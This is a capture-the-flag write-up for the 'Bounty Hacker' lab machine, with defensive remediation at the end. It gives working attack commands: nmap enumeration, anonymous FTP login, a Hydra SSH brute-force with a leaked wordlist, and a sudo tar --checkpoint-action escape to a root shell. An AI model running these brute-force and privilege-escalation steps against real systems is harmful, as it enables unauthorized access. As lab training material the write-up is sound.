Target IP: bounty.thm (Requires /etc/hosts entry)
Difficulty: Easy
Objective: User (user.txt) & Root (root.txt) Flags
1. Executive Summary
“Bounty Hacker” is a Linux machine themed around the anime Cowboy Bebop. The attack path is straightforward: we identify an Anonymous FTP service leaking sensitive files, including a target username (lin) and a potential password list. We perform a credential brute-force attack on SSH to gain initial access. Privilege escalation is achieved by exploiting a misconfigured sudo permission on the tar binary, utilizing the --checkpoint-action flag to execute a system shell as root.
Key TTPs (MITRE ATT&CK):
- T1595 (Active Scanning): Nmap port enumeration.
- T1078 (Valid Accounts): Anonymous FTP Access.
- T1083 (File and Directory Discovery): finding
locks.txtandtask.txt. - T1110 (Brute Force): Hydra attack against SSH.
- T1548 (Abuse Elevation Control Mechanism): Exploiting
sudorights ontar(GTFOBins).
2. Operational Setup
Host Configuration
echo "10.10.x.x bounty.thm" | sudo tee -a /etc/hostsWorkspace (Tmux)
- Pane 1 (Recon):
nmap,ftp. - Pane 2 (Attack):
hydra. - Pane 3 (Shell): SSH session.
3. Enumeration: “What do we see?”
A. Network Scanning
nmap -A -Pn -oN nmap/bounty bounty.thmResults:
- 21/tcp (FTP):
vsftpd 3.0.5. Anonymous Login Allowed. - 22/tcp (SSH): OpenSSH 8.2p1.
- 80/tcp (HTTP): Apache 2.4.41.
B. FTP Enumeration (The Leak)
Since Anonymous FTP is open, we check it first.
ftp bounty.thm
# Name: anonymous
# Password: anonymous
ls -laFiles Found:
locks.txt: A list of strings (likely passwords).task.txt: A text file.
Analysis of task.txt:
“Plan for tonight… protect Vicious… - lin”
Intelligence Gained:
- Username:
lin(Signed the note). - Password Candidate List:
locks.txt.
4. Initial Access: Credential Stuffing
We have a valid username (lin) and a wordlist (locks.txt). We don’t need rockyou.txt here; the box gave us the dictionary.
Command:
hydra -l lin -P locks.txt ssh://bounty.thmResult:
- User:
lin - Password:
RedDr4gonSynd1cat3(Example, based on the list).
Login:
ssh lin@bounty.thmUser Flag: Located at user.txt.
5. Privilege Escalation: Sudo Tar (GTFOBins)
Enumeration
We check for low-hanging fruit immediately.
sudo -lOutput:
User lin may run the following commands on bounty-hacker:
(root) /bin/tarThe Vulnerability: Wildcard/Checkpoint Injection
The tar command is used for archiving files. However, it has a feature called Checkpoints.
--checkpoint=1: Display a progress message every 1 record.--checkpoint-action=exec=COMMAND: Execute a command at every checkpoint.
If we can run tar as root, we can tell it to execute /bin/sh as a “checkpoint action.”
Exploitation
We run the following command to spawn a root shell.
# Syntax: sudo tar -cf <archive_name> <file_to_archive> <exploit_flags>
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/shWhy this works:
-cf /dev/null: We are creating an archive, but sending the data to the void (we don’t care about the file)./dev/null: The file we are archiving (again, doesn’t matter).--checkpoint-action=exec=/bin/sh: The Payload. As soon astarprocesses the first file, it triggers this action. Sincesudolaunchedtaras root,/bin/shspawns as root.
Result:
# id
uid=0(root) gid=0(root) groups=0(root)Root Flag: /root/root.txt.
6. Remediation (Blue Team)
- Disable Anonymous FTP:
- Set
anonymous_enable=NOin/etc/vsftpd.conf. - Never store sensitive data (like password lists or internal notes) on public-facing FTP servers.
- Sudo Restrictions:
- Avoid giving
sudoaccess to binaries that allow shell escapes or command execution (liketar,zip,vi,less,awk). - If
taris strictly needed for backups, hardcode the arguments in the sudoers file so the user cannot inject flags. - Example:
lin ALL=(root) /bin/tar -cvf /backup/backup.tar /var/www/html(Prevents flag injection).